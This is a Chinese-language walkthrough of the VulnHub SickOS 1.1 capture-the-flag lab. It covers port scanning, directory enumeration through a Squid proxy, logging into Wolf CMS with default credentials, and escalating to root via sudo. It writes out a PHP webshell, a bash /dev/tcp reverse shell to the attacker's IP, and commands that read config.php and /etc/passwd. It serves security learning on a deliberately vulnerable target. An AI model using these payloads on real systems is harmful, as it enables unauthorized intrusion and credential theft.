Vulnhub靶场学习之SickOS1.1

SickOs: 1.1

信息收集

主机查询

1
nmap -sn 10.0.0.1/24

发现10.0.0.135
image.png

扫描端口

1
sudo nmap --min-rate 10000 -p- 10.0.0.135

image.png
22、3128、8080
查询服务

1
sudo nmap -sT -sV -sC -O -p22,3128,8080 10.0.0.135

image.png
udp再查一次
image.png
脚本测试一下

1
sudo nmap --script=vuln -p22,3128,8080 10.0.0.135

image.png
8080代理关闭了。无法访问
但是能访问3128端口
image.png
查询发现这个是一套代理服务器和Web缓存服务器软件。该软件提供缓存万维网、过滤流量、代理上网等功能。

目录爆破

尝试爆破下路径:

1
sudo dirb http://10.0.0.135:3128

image.png
没有内容
再用gobuster测试一下

1
sudo gobuster dir -u http://10.0.0.135:3128/ --wordlist /usr/share/wordlists/dirb/big.txt

image.png
可能是因为代理的原因,这里使用3128的代理来跑一下:

1
sudo dirb http://10.0.0.135 -p http://10.0.0.135:3128

image.png

1
2
3
4
5
6
7
8
---- Scanning URL: http://10.0.0.135/ ----
+ http://10.0.0.135/cgi-bin/ (CODE:403|SIZE:286)                                                                                                                                            
+ http://10.0.0.135/connect (CODE:200|SIZE:109)                                                                                                                                             
+ http://10.0.0.135/index (CODE:200|SIZE:21)                                                                                                                                                
+ http://10.0.0.135/index.php (CODE:200|SIZE:21)                                                                                                                                            
+ http://10.0.0.135/robots (CODE:200|SIZE:45)                                                                                                                                               
+ http://10.0.0.135/robots.txt (CODE:200|SIZE:45)                                                                                                                                           
+ http://10.0.0.135/server-status (CODE:403|SIZE:291)

这里就需要使用代理。
比如说用浏览器自带的代理:
image.png
然后就可以访问了。
image.png
查看下之前扫到的东西。
image.png
查看下wolfcms
image.png
能注意到正常的文章链接前有一个?类似构造一下?admin
访问跳转了
image.png
弱口令 admin/admin
image.png
发现可以直接再里面写php代码
image.png
添加一句话木马:<?php system($_GET[1]);?>
image.png
然后shell
image.png
或者files可以上传文件
image.png

shell后

继续,反弹shell<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.132/4444 0>&1'");?>
image.png
发现ifconfig无法查看,命令在/sbin
image.png
image.png
这种cms服务一般去看config看数据库信息
vi config.php查看下config.php文件
image.png
有了数据库信息,去连数据库,这里直接给的就是root权限,这个密码可能也是ssh的密码。
但是不知道为什么这里mysql连不上。
image.png
看看都有哪些用户:

1
cat /etc/passwd

image.png
试一试有bash权限的几个用户:
sickos可以用john@123直接登录
image.png
sudo -l 查看权限
image.png
拥有全部权限。
直接获取root权限

1
sudo /bin/bash

image.png
可以查看root下的flag:
image.png